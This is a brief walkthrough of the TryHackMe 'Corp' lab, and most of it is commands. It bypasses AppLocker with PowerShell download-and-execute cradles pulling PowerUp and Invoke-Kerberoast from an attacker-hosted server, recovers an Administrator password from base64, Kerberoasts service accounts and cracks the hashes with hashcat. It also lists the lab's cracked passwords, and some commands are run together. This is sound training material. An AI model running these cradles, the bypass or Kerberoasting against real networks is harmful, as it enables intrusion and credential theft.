Corp
Room Link: https://tryhackme.com/room/corp
Bypassing Applocker
Load PowerUp.ps1 into memory.
Kali
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 81Add the following line at the bottom to PowerUp.ps1 so it Invokes all checks automatically once downloaded
PowerUp.ps1
Invoke-AllChecksVictim(powershell)
powershell -ep bypass
iex​(New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1') 
Kali
echo "dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=" | base64 -d
Kali
xfreerdp +clipboard /u:"Administrator" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$T
Kerberoasting
Run the below command from the Administrator account we just got access to.
Victim(powershell)
setspn -T medin -Q ​ */*
Kali
wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1
python2 -m SimpleHTTPServer 81Add the following line at the bottom to Invoke-Kerberoast.ps1 so it runs automatically once downloaded
Invoke-Kerberoast -OutputFormat hashcat ​ |flVictim(powershell)
powershell -ep bypass
powershell -c "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.131.240:81/Invoke-Kerberoast.ps1'))"
Run this to get rid of all the spaces.
Kali
cat hash.txt | sed 's/[[:space:]]//g' |tr -d '\n' | sed 's/$krb5tgs$23$*/\n&/g' > hash.txtLets use hashcat to bruteforce this password. The type of hash we're cracking is Kerberos 5 TGS-REP etype 23 and the hashcat code for this is 13100.
Kali
hashcat -m 13100 -a 0 hash2.txt /usr/share/wordlists/rockyo.txt --force
hashcat -m 13100 -a 0 hash2.txt /usr/share/wordlists/rockyou.txt --force --show
Kali
xfreerdp +clipboard /u:"fela" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: rubenF124Last updated